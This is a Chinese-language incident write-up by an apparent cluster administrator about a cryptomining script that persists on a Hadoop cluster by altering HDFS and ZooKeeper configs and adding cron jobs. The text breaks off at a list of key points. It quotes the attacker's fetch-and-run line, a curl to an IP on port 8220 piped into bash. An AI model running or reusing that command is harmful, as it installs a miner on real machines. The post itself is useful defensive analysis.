1、事件描述
集群挖矿脚本,这种事情遇到过好几次了,以前的基本上都是通过yarn的8088端口进来的,然后运行很多的application直接撑爆你的cpu,这种只需要关掉8088的外网访问端口基本就能解决。但是这一次遇到一个非常恶心的挖矿脚本,废fa不多说,先上脚本(如图):
大家可以看到这个脚本是有多恶心,这个还不是最恶心的地方,最恶心的地方是他会修改你集群的hdfs和zookeeper的配置文件,只要你启动相关的任务,他都会去运行一个定时任务来下载这个脚本并运行,相关代码如下:
curl http://149.28.137.164:8220/install.sh|bash
就算你把之前的脚本,定时任务全删了,他依然会通过这个口子进来,你不去仔细找的话,基本是一脸懵逼的样子。然后还会在你启动的每个集群服务的用户下面建立一个定时任务。不过这个矿机脚本不会将cpu直接撑爆,基本会在50%到80%左右徘徊。
2、关键点总结
a、黑客获得root权限(这就很恐怖了)
b、